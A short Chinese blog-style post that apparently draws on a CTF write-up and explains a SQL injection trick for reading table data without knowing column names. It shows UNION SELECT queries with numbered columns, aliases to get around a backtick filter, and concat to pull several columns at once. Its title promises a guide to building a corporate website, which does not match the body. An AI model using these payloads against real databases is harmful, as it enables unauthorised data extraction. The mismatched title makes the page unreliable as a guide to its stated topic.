企业官网建设流程全解析

参考https://err0r.top/article/mardasctf/

这是一张table表

假设在不知道列名的情况下，我们想查询一下列的内容

select 1,2,3,4,5 union select * from `table`;

这里的列数是需要猜测的

执行语句后

可以看到这里所有的列名都变成了数字，那么接下来想要查询列的话

select `2` from (select 1,2,3,4,5 union select * from `table`)a;

这样就查询到了原来username列的数据

如果反引号被过滤

select a from (select 1,2 as a,3,4,5 union select * from `table`)a;

如果想同时查询多个列

select concat(b,0x2d,c) from (select 1,2 as b,3 as c,4,5 union select * from `table`)a;